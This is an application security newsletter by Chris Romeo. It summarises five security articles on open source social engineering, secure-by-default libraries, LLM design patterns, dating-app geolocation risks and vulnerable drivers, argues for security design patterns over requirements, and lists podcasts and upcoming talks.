Reasonable 🔐AppSec #48 - Design Patterns, Five Security Articles, and Podcast Corner

A review of application security happenings and industry news from Chris Romeo.

Hey there,

In this week’s issue, please enjoy the following:

  • Five security articles 📰 that are worth YOUR time

  • Featured focus: Design Patterns

  • Application Security Podcast 🎙️Corner

  • Where to find Chris? 🌎

Five Security Articles 📰 that Are Worth YOUR Time

  1. Open Source Security (OpenSSF) and OpenJS Foundations Issue Alert for Social Engineering Takeovers of Open Source Projects

    The Open Source Security Foundation (OpenSSF) and OpenJS Foundation have issued an alert regarding social engineering attacks aimed at open-source projects. These attacks involve tactics like the persistent pursuit of maintainers by unknown community members seeking elevated privileges, which could lead to security breaches. The foundations are raising awareness about these threats and guiding to help maintainers secure their projects. [We always knew this was a hidden threat within the software supply chain, and now the theory has become a reality. Other open-source projects must be aware of this scenario and build controls to their project governance structure to prevent it.]

  2. tldrsec/awesome-secure-defaults — "awesome-secure-defaults" curates a list of libraries prioritizing security by default to help eliminate standard vulnerability classes. This resource includes various tools across multiple programming languages to provide developers with secure, easy-to-use solutions for enhancing application security. [I love secure by default. This repo is gold for finding open-source libraries indexed by language to solve the need for common security and privacy controls.]

  3. Secure corporate LLMs using only three patterns — Christophe Parisel outlines three security design patterns essential for securing corporate LLMs in 2024. He highlights the predominant risk of prompt injection, suggesting that other IT risks can be managed with existing security controls. [Design patterns are not new concepts, but they are underutilized. Whenever I see a discussion of a security design pattern, I lean closer to understand it better.]

  4. The Illusion of Privacy: Geolocation Risks in Modern Dating Apps — There are risks associated with geolocation features in modern dating apps, particularly highlighting how attackers can exploit these features to determine users' precise locations. Despite efforts by app developers to enhance privacy, techniques like trilateration can still accurately pinpoint a user's location, posing significant privacy and safety risks, especially in sensitive environments. [We must look closer at every example of a privacy challenge to apply controls better.]

  5. Strategies to monitor and prevent vulnerable driver attacks — The Microsoft Security Experts blog provides strategies for monitoring and preventing attacks via vulnerable drivers, highlighting the need for a multi-layered defense approach. The article discusses the importance of detecting unauthorized access early in the attack chain and adapting security strategies to meet specific organizational needs, offering solutions like Memory Integrity and Smart App Control for robust protection. [This one caught my attention because it’s outside of the usual things we talk about (web apps) regarding development these days. Drivers are the underlying layer that connects hardware to software and has not gotten much attention in the last decade.]

My talk at the RSA Conference this year is focused on “Secure and Privacy by Design Converge with Threat Modeling.” Through the creation of this talk, I’ve uncovered an old idea that we need to invest in much more: design patterns.

For some reason, from the dawn of computing and system building, requirements were the driving factor for what we build. Requirements are the standards we must comply with, the statements that govern the properties of features and subsystems. I’m about to share something controversial and counter-cultural for the security purists from the old days: requirements do more harm than good.

Requirements tend to be complex and overwhelming. Think of the OWASP ASVS, a project I’m a big fan of that provides value to our ecosystems and industry. It’s a complicated catalog of stuff you should do. Does anyone comply with the ASVS from end to end? I doubt it. I doubt anyone can say they comply with ASVS for 100% of the requirements listed.

Requirements are also challenging because they state the what but not the how—the what manifests as a statement of something. For example, “The product will protect data flows with TLS encryption.”. The what is excellent, but how do you do this? How do you make this a reality? That is the part that is missing.

Enter design patterns and the melding of requirements with a reference architecture to make a security control a reality. Design patterns bake multiple requirements into a security control cake and give the implementor a visualization of what they need to build to inherit a pattern's security (or privacy) goodness.

Patterns are where we need to invest going forward. Let’s take the hundreds of requirements and bake them into ten implementable patterns. Perhaps we can lower the complexity bar and move security and privacy forward. That is always my aim.

Podcast 🎙️ Corner

I love making podcasts. In Podcast Corner, you get a single place to see what I’ve put out this week. Sometimes, they are my podcasts. Other times, they are podcasts that have caught my attention.

  • Application Security Podcast

    • Dustin Lehr -- Culture Change through Champions and Gamification (Audio only; YouTube)

      • Dustin Lehr, Senior Director of Platform Security/Deputy CISO at Fivetran and Chief Solutions Officer at Katilyst Security, discusses the role of security champions within the developer community.

      • He describes how developers can become security advocates and the importance of a security-centric culture.

      • He also offers practical advice for organizations aiming to improve security through community-focused strategies.

  • Security Table

    • Prioritizing AppSec: A Conversation Between a VP of Eng, a Product Manager, and a Security "Pro" (Audio only; YouTube)

      • Prompted by fan mail, Chris, Izar, and Matt engage in a role-playing scenario as a VP of engineering, a security person, and a product manager.

      • They explore some challenges and competing perspectives in prioritizing application security. They highlight the importance of empathy, understanding business needs and language, and building organizational relationships while dealing with security threats and solutions.

  • Threat Modeling Podcast

    • The episode is scripted and undergoing editing now. It’s a second part from Nandita, where we discuss things that work and don’t work and how tooling impacts privacy threat modeling.

Pictures are Fun

Multiple requirements are baked into a security control cake.

Where to find Chris? 🌎

  • Webinar: Secure Smarter: Explore Threat Modeling with Devici (live product walkthrough and threat modeling discussion)

    • North America: April 24, 1:00 PM EDT/ 10:00 AM PDT, sign up.

    • EMEA: April 25, 1:00 PM BST / 2:00 PM CET, sign up.

  • BSides SF, May 4-5, 2024

    • I’ll be hanging out at the Devici booth during the event.

  • RSA, San Francisco, May 6-9, 2024

    • Speaking: Secure and Privacy by Design Converge with Threat Modeling (May 8, 14:25 Pacific)

    • Learning Lab: Threat Modeling Championship: Breaker vs. Builder (May 8, 08:30 Pacific) (This will fill up FAST)

    • I'm hanging out at the Devici booth at the Startup Expo for the rest of the time!

🤔 Have questions, comments, or feedback? I'd love to hear from you!

🔥 Reasonable AppSec is brought to you by Kerr Ventures.

🤝 Want to partner with Reasonable AppSec? Reach out, and let’s chat.